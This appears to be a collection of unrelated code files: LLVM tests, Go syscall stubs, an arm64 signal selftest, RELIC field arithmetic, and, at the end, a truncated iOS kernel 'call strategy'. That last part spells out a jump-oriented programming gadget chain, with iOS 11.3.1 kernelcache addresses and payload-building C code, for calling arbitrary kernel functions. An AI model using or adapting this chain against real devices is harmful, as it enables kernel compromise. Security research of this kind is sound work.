// RUN: %clang -target i386-unknown-unknown -ccc-print-phases -emit-ast %s 2> %t
// RUN: echo 'END' >> %t
// RUN: FileCheck -check-prefix EMIT-AST-PHASES -input-file %t %s
// EMIT-AST-PHASES: 0: input,
// EMIT-AST-PHASES: , c
// EMIT-AST-PHASES: 1: preprocessor, {0}, cpp-output
// EMIT-AST-PHASES: 2: compiler, {1}, ast
// EMIT-AST-PHASES-NOT: 3:
// EMIT-AST-PHASES: END
// RUN: touch %t.ast
// RUN: %clang -target i386-unknown-unknown -ccc-print-phases -c %t.ast 2> %t
// RUN: echo 'END' >> %t
// RUN: FileCheck -check-prefix COMPILE-AST-PHASES -input-file %t %s
// COMPILE-AST-PHASES: 0: input,
// COMPILE-AST-PHASES: , ast
// COMPILE-AST-PHASES: 1: compiler, {0}, ir
// COMPILE-AST-PHASES: 2: backend, {1}, assembler
// COMPILE-AST-PHASES: 3: assembler, {2}, object
// COMPILE-AST-PHASES-NOT: 4:
// COMPILE-AST-PHASES: END
// FIXME: There is a problem with compiling ASTs in that the input language is
// not available for use by other tools (for example, to automatically add
// -lstdc++). We may need -x [objective-]c++-ast and all that goodness. :(
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build !gccgo
#include "textflag.h"
//
// System call support for AMD64, NetBSD
//
// Just jump to package syscall's implementation for all these functions.
// The runtime may know about them.
TEXT ·Syscall(SB),NOSPLIT,$0-56
JMP syscall·Syscall(SB)
TEXT ·Syscall6(SB),NOSPLIT,$0-80
JMP syscall·Syscall6(SB)
TEXT ·Syscall9(SB),NOSPLIT,$0-104
JMP syscall·Syscall9(SB)
TEXT ·RawSyscall(SB),NOSPLIT,$0-56
JMP syscall·RawSyscall(SB)
TEXT ·RawSyscall6(SB),NOSPLIT,$0-80
JMP syscall·RawSyscall6(SB)
| {
"language": "Assembly"
} |
; RUN: llvm-as < %s > %t
; RUN: llvm-nm %t | FileCheck %s
; Test for isBitcodeFile; llvm-nm must read from a file for this test.
target datalayout = "e-p:32:32:32-i1:8:8-i8:8:8-i16:16:16-i32:32:32-i64:32:64-f32:32:32-f64:32:64-v64:64:64-v128:128:128-a0:0:64-f80:128:128"
target triple = "i686-apple-darwin9.2.2"
; CHECK: foo
define i32 @foo() {
ret i32 0
}
| {
"language": "Assembly"
} |
; RUN: llc < %s -march=xcore
%struct.st = type <{ i8, i32, i8, i32, i8, i32 }>
@x = external global %struct.st, align 4
define i32 @test_entry() nounwind {
entry:
%0 = load i32* getelementptr inbounds (%struct.st* @x, i32 0, i32 3), align 2
ret i32 %0
}
| {
"language": "Assembly"
} |
// SPDX-License-Identifier: GPL-2.0
/*
* Copyright (C) 2019 ARM Limited
*
* Try to mangle the ucontext from inside a signal handler, toggling
* the mode bit to escalate exception level: this attempt must be spotted
* by the kernel and the test case is expected to be terminated via SEGV.
*/
#include "test_signals_utils.h"
#include "testcases.h"
#include "mangle_pstate_invalid_mode_template.h"
DEFINE_TESTCASE_MANGLE_PSTATE_INVALID_MODE(3h);
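/*
 * Illustrative sketch only (not part of the selftest): the shape of the
 * handler that the template above expands to. Assumes arm64 Linux, where
 * the EL3h mode encoding is 0b1101 (the "3h" in the test name), mirroring
 * the kernel's PSR_MODE_* definitions. On sigreturn the kernel must spot
 * the escalated mode field and terminate the task with SIGSEGV instead of
 * resuming it.
 */
#include <signal.h>
#include <ucontext.h>

#define SKETCH_PSR_MODE_MASK	0x0000000f
#define SKETCH_PSR_MODE_EL3H	0x0000000d

void mangle_pstate_sketch(int sig, siginfo_t *si, void *uc_)
{
	ucontext_t *uc = uc_;

	/* Toggle the saved mode field to a privileged exception level. */
	uc->uc_mcontext.pstate &= ~SKETCH_PSR_MODE_MASK;
	uc->uc_mcontext.pstate |= SKETCH_PSR_MODE_EL3H;
}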
| {
"language": "Assembly"
} |
/*
* RELIC is an Efficient LIbrary for Cryptography
* Copyright (C) 2007-2019 RELIC Authors
*
* This file is part of RELIC. RELIC is legal property of its developers,
* whose names are not listed here. Please refer to the COPYRIGHT file
* for contact information.
*
* RELIC is free software; you can redistribute it and/or modify it under the
* terms of the version 2.1 (or later) of the GNU Lesser General Public License
* as published by the Free Software Foundation; or version 2.0 of the Apache
* License as published by the Apache Software Foundation. See the LICENSE files
* for more details.
*
* RELIC is distributed in the hope that it will be useful, but WITHOUT ANY
* WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
* A PARTICULAR PURPOSE. See the LICENSE files for more details.
*
* You should have received a copy of the GNU Lesser General Public or the
* Apache License along with RELIC. If not, see <https://www.gnu.org/licenses/>
* or <https://www.apache.org/licenses/>.
*/
#include "relic_fp_low.h"
/**
* @file
*
* Implementation of low-level prime field multiplication.
*
* @version $Id: relic_fp_add_low.c 88 2009-09-06 21:27:19Z dfaranha $
* @ingroup fp
*/
#define P0 0xAAA00001800002AB
#define P1 0xA6C589556B2AA956
#define P2 0xB3DB9994ACE86D1B
#define P3 0x4BD93954FCB314B8
#define P4 0x3F665E3A5B1D5623
#define P5 0xA00E0F95B4920300
#define P6 0x555955557955572A
#define P7 0x0000000000000055
#define U0 0x4B3EF8137F4017FD
.text
.macro ADD1 i j
movq 8*\i(%rsi), %r10
adcq $0, %r10
movq %r10, 8*\i(%rdi)
.if \i - \j
ADD1 "(\i + 1)" \j
.endif
.endm
.macro ADDN i j
movq 8*\i(%rdx), %r11
adcq 8*\i(%rsi), %r11
movq %r11, 8*\i(%rdi)
.if \i - \j
ADDN "(\i + 1)" \j
.endif
.endm
.macro SUB1 i j
movq 8*\i(%rsi),%r10
sbbq $0, %r10
movq %r10,8*\i(%rdi)
.if \i - \j
SUB1 "(\i + 1)" \j
.endif
.endm
.macro SUBN i j
movq 8*\i(%rsi), %r8
sbbq 8*\i(%rdx), %r8
movq %r8, 8*\i(%rdi)
.if \i - \j
SUBN "(\i + 1)" \j
.endif
.endm
.macro DBLN i j
movq 8*\i(%rsi), %r8
adcq %r8, %r8
movq %r8, 8*\i(%rdi)
.if \i - \j
DBLN "(\i + 1)" \j
.endif
.endm
.macro MULN i, j, k, C, R0, R1, R2, A, B
.if \j > \k
movq 8*\i(\A), %rax
mulq 8*\j(\B)
addq %rax , \R0
adcq %rdx , \R1
adcq $0 , \R2
MULN "(\i + 1)", "(\j - 1)", \k, \C, \R0, \R1, \R2, \A, \B
.else
movq 8*\i(\A), %rax
mulq 8*\j(\B)
addq %rax , \R0
movq \R0 , 8*(\i+\j)(\C)
adcq %rdx , \R1
adcq $0 , \R2
.endif
.endm
.macro FP_MULN_LOW C, R0, R1, R2, A, B
movq 0(\A),%rax
mulq 0(\B)
movq %rax ,0(\C)
movq %rdx ,\R0
xorq \R1,\R1
xorq \R2,\R2
MULN 0, 1, 0, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 0, 2, 0, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 0, 3, 0, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 0, 4, 0, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 0, 5, 0, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 0, 6, 0, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 0, 7, 0, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 1, 7, 1, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 2, 7, 2, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 3, 7, 3, \C, \R0, \R1, \R2, \A, \B
xorq \R0,\R0
MULN 4, 7, 4, \C, \R1, \R2, \R0, \A, \B
xorq \R1,\R1
MULN 5, 7, 5, \C, \R2, \R0, \R1, \A, \B
xorq \R2,\R2
MULN 6, 7, 6, \C, \R0, \R1, \R2, \A, \B
movq 56(\A),%rax
mulq 56(\B)
addq %rax ,\R1
movq \R1 ,112(\C)
adcq %rdx ,\R2
movq \R2 ,120(\C)
.endm
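/*
 * For reference (not part of the original source): a hypothetical C sketch of
 * the product-scanning (Comba) multiplication that the MULN/FP_MULN_LOW
 * macros above unroll. Three accumulator words rotate after every column,
 * exactly like the (R0, R1, R2) register rotation in the macro invocations.
 * Assumes <stdint.h> types, unsigned __int128 support, and 8 64-bit limbs
 * per operand.
 *
 *   typedef unsigned __int128 u128;
 *
 *   void fp_muln_sketch(uint64_t c[16], const uint64_t a[8],
 *                       const uint64_t b[8]) {
 *       uint64_t r0 = 0, r1 = 0, r2 = 0;
 *       for (int k = 0; k < 15; k++) {
 *           int lo = (k < 8) ? 0 : k - 7;
 *           int hi = (k < 8) ? k : 7;
 *           for (int i = lo; i <= hi; i++) {
 *               u128 t = (u128)a[i] * b[k - i];
 *               uint64_t tl = (uint64_t)t, th = (uint64_t)(t >> 64);
 *               r0 += tl;
 *               th += (r0 < tl);
 *               r1 += th;
 *               r2 += (r1 < th);
 *           }
 *           c[k] = r0;
 *           r0 = r1;
 *           r1 = r2;
 *           r2 = 0;
 *       }
 *       c[15] = r0;
 *   }
 */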
.macro _RDCN0 i, j, k, R0, R1, R2, A, P
movq 8*\i(\A), %rax
mulq 8*\j(\P)
addq %rax, \R0
adcq %rdx, \R1
adcq $0, \R2
.if \j > 1
_RDCN0 "(\i + 1)", "(\j - 1)", \k, \R0, \R1, \R2, \A, \P
.else
addq 8*\k(\A), \R0
adcq $0, \R1
adcq $0, \R2
movq \R0, %rax
mulq %rcx
movq %rax, 8*\k(\A)
mulq 0(\P)
addq %rax , \R0
adcq %rdx , \R1
adcq $0 , \R2
xorq \R0, \R0
.endif
.endm
.macro RDCN0 i, j, R0, R1, R2, A, P
_RDCN0 \i, \j, \j, \R0, \R1, \R2, \A, \P
.endm
.macro _RDCN1 i, j, k, l, R0, R1, R2, A, P
movq 8*\i(\A), %rax
mulq 8*\j(\P)
addq %rax, \R0
adcq %rdx, \R1
adcq $0, \R2
.if \j > \l
_RDCN1 "(\i + 1)", "(\j - 1)", \k, \l, \R0, \R1, \R2, \A, \P
.else
addq 8*\k(\A), \R0
adcq $0, \R1
adcq $0, \R2
movq \R0, 8*\k(\A)
xorq \R0, \R0
.endif
.endm
.macro RDCN1 i, j, R0, R1, R2, A, P
_RDCN1 \i, \j, "(\i + \j)", \i, \R0, \R1, \R2, \A, \P
.endm
// r8, r9, r10, r11, r12, r13, r14, r15, rbp, rbx, rsp, //rsi, rdi, //rax, rcx, rdx
.macro FP_RDCN_LOW C, R0, R1, R2, A, P
xorq \R1, \R1
movq $U0, %rcx
movq 0(\A), \R0
movq \R0 , %rax
mulq %rcx
movq %rax , 0(\A)
mulq 0(\P)
addq %rax , \R0
adcq %rdx , \R1
xorq \R2 , \R2
xorq \R0 , \R0
RDCN0 0, 1, \R1, \R2, \R0, \A, \P
RDCN0 0, 2, \R2, \R0, \R1, \A, \P
RDCN0 0, 3, \R0, \R1, \R2, \A, \P
RDCN0 0, 4, \R1, \R2, \R0, \A, \P
RDCN0 0, 5, \R2, \R0, \R1, \A, \P
RDCN0 0, 6, \R0, \R1, \R2, \A, \P
RDCN0 0, 7, \R1, \R2, \R0, \A, \P
RDCN1 1, 7, \R2, \R0, \R1, \A, \P
RDCN1 2, 7, \R0, \R1, \R2, \A, \P
RDCN1 3, 7, \R1, \R2, \R0, \A, \P
RDCN1 4, 7, \R2, \R0, \R1, \A, \P
RDCN1 5, 7, \R0, \R1, \R2, \A, \P
RDCN1 6, 7, \R1, \R2, \R0, \A, \P
RDCN1 7, 7, \R2, \R0, \R1, \A, \P
addq 8*15(\A), \R0
movq \R0, 120(\A)
movq 64(\A), %r11
movq 72(\A), %r12
movq 80(\A), %r13
movq 88(\A), %r14
movq 96(\A), %r15
movq 104(\A), %rcx
movq 112(\A), %rbp
movq 120(\A), %rdx
subq p0(%rip), %r11
sbbq p1(%rip), %r12
sbbq p2(%rip), %r13
sbbq p3(%rip), %r14
sbbq p4(%rip), %r15
sbbq p5(%rip), %rcx
sbbq p6(%rip), %rbp
sbbq p7(%rip), %rdx
cmovc 64(\A), %r11
cmovc 72(\A), %r12
cmovc 80(\A), %r13
cmovc 88(\A), %r14
cmovc 96(\A), %r15
cmovc 104(\A), %rcx
cmovc 112(\A), %rbp
cmovc 120(\A), %rdx
movq %r11,0(\C)
movq %r12,8(\C)
movq %r13,16(\C)
movq %r14,24(\C)
movq %r15,32(\C)
movq %rcx,40(\C)
movq %rbp,48(\C)
movq %rdx,56(\C)
.endm
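/*
 * For reference (not part of the original source): a hypothetical C sketch of
 * the word-by-word Montgomery reduction that FP_RDCN_LOW above implements,
 * where u0 = -p^(-1) mod 2^64 is the U0 constant defined at the top of this
 * file. Each iteration chooses m so that limb i of t becomes zero
 * (t[i] + m*p[0] == 0 mod 2^64); after eight iterations the reduced value
 * sits in t[8..15], and the final conditional subtraction mirrors the
 * sbbq/cmovc sequence at the end of the macro. Assumes <stdint.h> types and
 * unsigned __int128.
 *
 *   typedef unsigned __int128 u128;
 *
 *   void fp_rdcn_sketch(uint64_t c[8], uint64_t t[16],
 *                       const uint64_t p[8], uint64_t u0) {
 *       for (int i = 0; i < 8; i++) {
 *           uint64_t m = t[i] * u0, carry = 0;
 *           for (int j = 0; j < 8; j++) {
 *               u128 s = (u128)m * p[j] + t[i + j] + carry;
 *               t[i + j] = (uint64_t)s;
 *               carry = (uint64_t)(s >> 64);
 *           }
 *           for (int j = i + 8; j < 16 && carry != 0; j++) {
 *               u128 s = (u128)t[j] + carry;
 *               t[j] = (uint64_t)s;
 *               carry = (uint64_t)(s >> 64);
 *           }
 *       }
 *       uint64_t borrow = 0, r[8];
 *       for (int j = 0; j < 8; j++) {
 *           u128 d = (u128)t[8 + j] - p[j] - borrow;
 *           r[j] = (uint64_t)d;
 *           borrow = (uint64_t)(d >> 64) & 1;
 *       }
 *       for (int j = 0; j < 8; j++)
 *           c[j] = borrow ? t[8 + j] : r[j];
 *   }
 */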
| {
"language": "Assembly"
} |
// Copyright 2009 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
//
// System calls for amd64, Windows are implemented in runtime/syscall_windows.goc
//
TEXT ·getprocaddress(SB), 7, $0-32
JMP syscall·getprocaddress(SB)
TEXT ·loadlibrary(SB), 7, $0-24
JMP syscall·loadlibrary(SB)
| {
"language": "Assembly"
} |
; RUN: echo create %t.a > %t.mri
; RUN: echo create %t.a >> %t.mri
; RUN: echo save >> %t.mri
; RUN: echo end >> %t.mri
; RUN: not llvm-ar -M < %t.mri 2>&1 | FileCheck %s
; CHECK: Editing multiple archives not supported
| {
"language": "Assembly"
} |
// -*- C++ -*-
//===----------------------------------------------------------------------===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
int main(int, char**)
{
return 0;
}
| {
"language": "Assembly"
} |
/*
* Arm64 Kernel Function Call Strategy 6
* -------------------------------------
*
* This is a variant of call strategy 5 that supports the iOS 11.3.1 kernelcache for the iPhone 8.
* Unfortunately due to a change in GADGET_POPULATE_2, this variant only supports up to 9
* arguments rather than 14.
*
* -----------------------------------------------------------------------------------------------
*
* kernel_call_2
* REGION_0 = {
* 0: REGION_1
* 8: FUNCTION
* 10: ARGUMENT_0
* 18
* 20: REGION_ARGUMENTS_2_TO_8
* 28: ARGUMENT_1
* 30: GADGET_POPULATE_3
* 38
* 40
* 48: GADGET_CALL_FUNCTION_1
* c0: JOP_STACK_2
* 268: REGION_2
* 288: <-RESULT
* }
* REGION_1 = {
* a0: JOP_DISPATCH
* d0: GADGET_STORE_RESULT_2
* 390: JOP_DISPATCH
* }
* REGION_ARGUMENTS_2_TO_8 = {
* 0: ARGUMENT_2
* 8: ARGUMENT_3
* 10: ARGUMENT_4
* 18: ARGUMENT_5
* 20: ARGUMENT_6
* 28: ARGUMENT_7
* 30: ARGUMENT_8
* }
* REGION_2 = {
* 0: REGION_3
* }
* REGION_3 = {
* 158: GADGET_EPILOGUE_2
* }
* JOP_STACK_1 = [
* MOV_X23_X19__BR_X8
* GADGET_INITIALIZE_X20_1
* MOV_X25_X19__BR_X8
* GADGET_POPULATE_3
* ]
* JOP_STACK_2 = [
* MOV_X19_X4__BR_X8
* MOV_X20_X7__BR_X8
* MOV_X23_X6__BLR_X8
* MOV_X0_X3__BLR_X8
* MOV_X24_X0__BLR_X8
* MOV_X8_X10__BR_X9
* ]
* x0 = REGION_0
* x1 = JOP_STACK_1
* pc = GADGET_PROLOGUE_2
*
* GADGET_PROLOGUE_2 (0xfffffff0063f51ac):
* ;; Save registers x19-x28, save the frame (x29, x30), and make
* ;; room for 0x40 bytes of local variables. sp must be
* ;; preserved until the epilogue.
* sub sp, sp, #0xa0
* stp x28, x27, [sp, #0x40]
* stp x26, x25, [sp, #0x50]
* stp x24, x23, [sp, #0x60]
* stp x22, x21, [sp, #0x70]
* stp x20, x19, [sp, #0x80]
* stp x29, x30, [sp, #0x90]
* add x29, sp, #0x90
* mov x19, x0
* ldr x8, [x19]
* ldr x8, [x8, #0x390]
* blr x8
* SAVE_REGISTERS(x19, ..., x28)
* x29 = STACK_FRAME()
* RESERVE_STACK(0x40)
* x19 = REGION_0
* x8 = REGION_0[0] = REGION_1
* x8 = REGION_1[0x390] = JOP_DISPATCH
* pc = JOP_DISPATCH
*
* ;; Just after the prologue we have the following register values:
* ;; x0 = REGION_0
* ;; x1 = JOP_STACK_1
* ;; x8 = JOP_DISPATCH
* ;; x19 = REGION_0
* ;; x29 = FRAME
* ;; We will populate registers using GADGET_POPULATE_3. Since we're using this
* ;; gadget with JOP_DISPATCH, we first need to initialize x20 to JOP_STACK_2 and
* ;; x23 to REGION_0.
*
* JOP_DISPATCH (0xfffffff0068fa24c):
* ldp x2, x1, [x1]
* br x2
* x2 = MOV_X23_X19__BR_X8
* pc = MOV_X23_X19__BR_X8
*
* MOV_X23_X19__BR_X8 (0xfffffff0066eb340)
* mov x23, x19
* br x8
* x23 = REGION_0
* pc = JOP_DISPATCH
*
* GADGET_INITIALIZE_X20_1 (0xfffffff0061d3d34):
* ;; This is a hack to get x20 to point to JOP_STACK_2 before
* ;; using GADGET_POPULATE_3.
* ldr x20, [x19, #0xc0]
* ldr x8, [x0]
* ldr x8, [x8, #0xa0]
* blr x8
* x20 = REGION_0[0xc0] = JOP_STACK_2
* x8 = REGION_0[0] = REGION_1
* x8 = REGION_1[0xa0] = JOP_DISPATCH
* pc = JOP_DISPATCH
*
* ;; We're about to execute GADGET_POPULATE_3. We want to fill the following
* ;; registers:
* ;; x19 = ARGUMENT_0
* ;; x20 = ARGUMENT_1
* ;; x23 = REGION_ARGUMENTS_2_TO_8
* ;; x24 = FUNCTION
* ;; x25 = REGION_0 (which serves as CALL_RESUME)
* ;; Last of all we want to set:
* ;; x8 = GADGET_CALL_FUNCTION_1
* ;; pc = GADGET_POPULATE_3
* ;; GADGET_POPULATE_3 will give us control of the following registers:
* ;; x3, x4, x5, x6, x7, x9, x10
* ;; Since we already have REGION_0 in x19, we'll set x25 now.
*
* MOV_X25_X19__BR_X8 (0xfffffff00668301c):
* mov x25, x19
* br x8
* x25 = REGION_0
* pc = JOP_DISPATCH
*
* GADGET_POPULATE_3 (0xfffffff006bfc320):
* ldp x2, x3, [x23]
* ldp x4, x5, [x23, #0x10]
* ldp x6, x7, [x23, #0x20]
* ldr x9, [x23, #0x30]
* ldur q0, [x23, #0x38]
* ldr x10, [x23, #0x48]
* stp x21, x22, [sp, #0x20]
* str x10, [sp, #0x18]
* stur q0, [sp, #8]
* str x9, [sp]
* mov x0, x19
* mov x1, x20
* blr x8
* x2 = REGION_0[0]
* x3 = REGION_0[0x8] = FUNCTION
* x4 = REGION_0[0x10] = ARGUMENT_0
* x5 = REGION_0[0x18]
* x6 = REGION_0[0x20] = REGION_ARGUMENTS_2_TO_8
* x7 = REGION_0[0x28] = ARGUMENT_1
* x9 = REGION_0[0x30] = GADGET_POPULATE_3
* x10 = REGION_0[0x48] = GADGET_CALL_FUNCTION_1
* x0 = REGION_0
* x1 = JOP_STACK_2
* pc = JOP_DISPATCH
*
* ;; Now that we've populated the registers, we just need to move the values to
* ;; where they belong. We need to set:
* ;; x19 = ARGUMENT_0
* ;; x20 = ARGUMENT_1
* ;; x23 = REGION_ARGUMENTS_2_TO_8
* ;; x24 = FUNCTION
* ;; x8 = GADGET_CALL_FUNCTION_1
* ;; pc = GADGET_POPULATE_3
*
* MOV_X19_X4__BR_X8 (0xfffffff006648eb4):
* mov x19, x4
* br x8
* x19 = ARGUMENT_0
* pc = JOP_DISPATCH
*
* MOV_X20_X7__BR_X8 (0xfffffff0065d1454):
* mov x20, x7
* br x8
* x20 = ARGUMENT_1
* pc = JOP_DISPATCH
*
* MOV_X23_X6__BLR_X8 (0xfffffff0065b3dc4):
* mov x23, x6
* blr x8
* x23 = REGION_ARGUMENTS_2_TO_8
* pc = JOP_DISPATCH
*
* MOV_X0_X3__BLR_X8 (0xfffffff0072a34a4):
* mov x0, x3
* blr x8
* x0 = FUNCTION
* pc = JOP_DISPATCH
*
* MOV_X24_X0__BLR_X8 (0xfffffff0075e5574):
* mov x24, x0
* blr x8
* x24 = FUNCTION
* pc = JOP_DISPATCH
*
* MOV_X8_X10__BR_X9 (0xfffffff006625318):
* mov x8, x10
* br x9
* x8 = GADGET_CALL_FUNCTION_1
* pc = GADGET_POPULATE_3
*
* ;; At this point, we have set the following registers:
* ;; x8 = GADGET_CALL_FUNCTION_1
* ;; x19 = ARGUMENT_0
* ;; x20 = ARGUMENT_1
* ;; x23 = REGION_ARGUMENTS_2_TO_8
* ;; x24 = FUNCTION
* ;; x25 = REGION_0
* ;; pc = GADGET_POPULATE_3
*
* GADGET_POPULATE_3 (0xfffffff006bfc320):
* ldp x2, x3, [x23]
* ldp x4, x5, [x23, #0x10]
* ldp x6, x7, [x23, #0x20]
* ldr x9, [x23, #0x30]
* ldur q0, [x23, #0x38]
* ldr x10, [x23, #0x48]
* stp x21, x22, [sp, #0x20]
* str x10, [sp, #0x18]
* stur q0, [sp, #8]
* str x9, [sp]
* mov x0, x19
* mov x1, x20
* blr x8
* x2 = REGION_ARGUMENTS_2_TO_8[0] = ARGUMENT_2
* x3 = REGION_ARGUMENTS_2_TO_8[0x8] = ARGUMENT_3
* x4 = REGION_ARGUMENTS_2_TO_8[0x10] = ARGUMENT_4
* x5 = REGION_ARGUMENTS_2_TO_8[0x18] = ARGUMENT_5
* x6 = REGION_ARGUMENTS_2_TO_8[0x20] = ARGUMENT_6
* x7 = REGION_ARGUMENTS_2_TO_8[0x28] = ARGUMENT_7
* x9 = REGION_ARGUMENTS_2_TO_8[0x30] = ARGUMENT_8
* x10 = REGION_ARGUMENTS_2_TO_8[0x48]
* STACK = [
* ARGUMENT_8,
* ]
* x0 = ARGUMENT_0
* x1 = ARGUMENT_1
* pc = GADGET_CALL_FUNCTION_1
*
* ;; Now all the arguments are set up correctly and we will execute
* ;; GADGET_CALL_FUNCTION_1. The following gadget allows us to resume execution
* ;; after the function call without messing with x30.
*
* GADGET_CALL_FUNCTION_1 (0xfffffff007592540):
* blr x24
* mov x19, x0
* ldr x8, [x25]
* ldr x8, [x8, #0xd0]
* mov x0, x25
* blr x8
* pc = FUNCTION
* x0 = RETURN_VALUE
* x19 = RETURN_VALUE
* x8 = REGION_0[0] = REGION_1
* x8 = REGION_1[0xd0] = GADGET_STORE_RESULT_2
* x0 = REGION_0
* pc = GADGET_STORE_RESULT_2
*
* GADGET_STORE_RESULT_2 (0xfffffff006459eb8):
* str x19, [x0, #0x288]
* ldr x0, [x0, #0x268]
* ldr x8, [x0]
* ldr x8, [x8, #0x158]
* blr x8
* REGION_0[0x288] = RETURN_VALUE
* x0 = REGION_0[0x268] = REGION_2
* x8 = REGION_2[0] = REGION_3
* x8 = REGION_3[0x158] = GADGET_EPILOGUE_2
* pc = GADGET_EPILOGUE_2
*
* GADGET_EPILOGUE_2 (0xfffffff0070f0bac):
* ;; Reset stack to entry conditions and return to caller. sp
* ;; must have been preserved from the prologue.
* ldp x29, x30, [sp, #0x90]
* ldp x20, x19, [sp, #0x80]
* ldp x22, x21, [sp, #0x70]
* ldp x24, x23, [sp, #0x60]
* ldp x26, x25, [sp, #0x50]
* ldp x28, x27, [sp, #0x40]
* add sp, sp, #0xa0
* ret
* RESTORE_REGISTERS(x19, ..., x28)
* pc = CALLER
*
* -----------------------------------------------------------------------------------------------
*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f
* +----------------------------------------------------------------+
* 0 |BB BBAAAAAA AAAAAA AACCCCCCCCCCCCCC DDEE AA|
* 100 |JJJJJJJJJJJJJJJJKKKKKKKKKKKKKKKKKKKKKKKK |
* 200 | AA ** BB |
* +----------------------------------------------------------------+
* 0 1 2 3 4 5 6 7 8 9 a b c d e f
*
* A = REGION_0 = 0 - 270 @ 38
* * = RESULT = 0 - 8 @ 288 + REGION_0
* B = REGION_1 = a0 - 398 @ -a0
* C = REGION_ARGUMENTS_2_TO_8 = 0 - 38 @ 88
* D = REGION_2 = 0 - 8 @ d8
* E = REGION_3 = 158 - 160 @ -78
*
* J = JOP_STACK_1 = 0 - 40 @ 100
* K = JOP_STACK_2 = 0 - 60 @ 140
*
*/
#include "arm64/jop/call_strategy.h"
#include "arm64/jop/gadgets_static.h"
#include <assert.h>
#include <unistd.h> // for ssize_t
static bool
check() {
#define NEED(gadget) \
if (static_gadgets[gadget].address == 0) { \
return false; \
}
NEED(GADGET_PROLOGUE_2);
NEED(LDP_X2_X1_X1__BR_X2); // JOP_DISPATCH
NEED(MOV_X23_X19__BR_X8);
NEED(GADGET_INITIALIZE_X20_1);
NEED(MOV_X25_X19__BR_X8);
NEED(GADGET_POPULATE_3);
NEED(MOV_X19_X4__BR_X8);
NEED(MOV_X20_X7__BR_X8);
NEED(MOV_X23_X6__BLR_X8);
NEED(MOV_X0_X3__BLR_X8);
NEED(MOV_X24_X0__BLR_X8);
NEED(MOV_X8_X10__BR_X9);
NEED(GADGET_CALL_FUNCTION_1);
NEED(GADGET_STORE_RESULT_2);
NEED(GADGET_EPILOGUE_2);
return true;
#undef NEED
}
// Get the gadget by index, ensuring that it exists.
static inline uint64_t
gadget(unsigned gadget_index) {
uint64_t address = static_gadgets[gadget_index].address;
assert(address != 0);
return address;
}
static void
build(uint64_t func, const uint64_t args[14], kaddr_t kernel_payload,
void *payload0, struct jop_call_initial_state *initial_state,
uint64_t *result_address) {
uint8_t *payload = payload0;
// Define the offsets from the start of the payload to each of the structures.
const ssize_t REGION_0_OFFSET = 0x38;
const ssize_t RESULT_OFFSET = 0x288 + REGION_0_OFFSET;
const ssize_t REGION_1_OFFSET = -0xa0;
const ssize_t REGION_ARGUMENTS_2_TO_8_OFFSET = 0x88;
const ssize_t REGION_2_OFFSET = 0xd8;
const ssize_t REGION_3_OFFSET = -0x78;
const ssize_t JOP_STACK_1_OFFSET = 0x100;
const ssize_t JOP_STACK_2_OFFSET = 0x140;
// Get the addresses of each region in the local buffer.
uint8_t *payload_REGION_0 = payload + REGION_0_OFFSET;
uint8_t *payload_REGION_1 = payload + REGION_1_OFFSET;
uint8_t *payload_REGION_ARGUMENTS_2_TO_8 = payload + REGION_ARGUMENTS_2_TO_8_OFFSET;
uint8_t *payload_REGION_2 = payload + REGION_2_OFFSET;
uint8_t *payload_REGION_3 = payload + REGION_3_OFFSET;
uint8_t *payload_JOP_STACK_1 = payload + JOP_STACK_1_OFFSET;
// Get the addresses of each region in the kernel.
uint64_t kernel_REGION_0 = kernel_payload + REGION_0_OFFSET;
uint64_t kernel_RESULT = kernel_payload + RESULT_OFFSET;
uint64_t kernel_REGION_1 = kernel_payload + REGION_1_OFFSET;
uint64_t kernel_REGION_ARGUMENTS_2_TO_8 = kernel_payload + REGION_ARGUMENTS_2_TO_8_OFFSET;
uint64_t kernel_REGION_2 = kernel_payload + REGION_2_OFFSET;
uint64_t kernel_REGION_3 = kernel_payload + REGION_3_OFFSET;
uint64_t kernel_JOP_STACK_1 = kernel_payload + JOP_STACK_1_OFFSET;
uint64_t kernel_JOP_STACK_2 = kernel_payload + JOP_STACK_2_OFFSET;
// Construct the REGION_0 region.
*(uint64_t *)(payload_REGION_0 + 0x0) = kernel_REGION_1;
*(uint64_t *)(payload_REGION_0 + 0x8) = func;
*(uint64_t *)(payload_REGION_0 + 0x10) = args[0];
*(uint64_t *)(payload_REGION_0 + 0x20) = kernel_REGION_ARGUMENTS_2_TO_8;
*(uint64_t *)(payload_REGION_0 + 0x28) = args[1];
*(uint64_t *)(payload_REGION_0 + 0x30) = gadget(GADGET_POPULATE_3);
*(uint64_t *)(payload_REGION_0 + 0x48) = gadget(GADGET_CALL_FUNCTION_1);
*(uint64_t *)(payload_REGION_0 + 0xc0) = kernel_JOP_STACK_2;
*(uint64_t *)(payload_REGION_0 + 0x268) = kernel_REGION_2;
// Construct the REGION_1 region.
*(uint64_t *)(payload_REGION_1 + 0xa0) = gadget(LDP_X2_X1_X1__BR_X2);
*(uint64_t *)(payload_REGION_1 + 0xd0) = gadget(GADGET_STORE_RESULT_2);
*(uint64_t *)(payload_REGION_1 + 0x390) = gadget(LDP_X2_X1_X1__BR_X2);
// Construct the REGION_ARGUMENTS_2_TO_8 region.
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x0) = args[2];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x8) = args[3];
*(uint64_t *)(payload_REGION_ARGUMENTS_2_TO_8 + 0x10) = args[4];
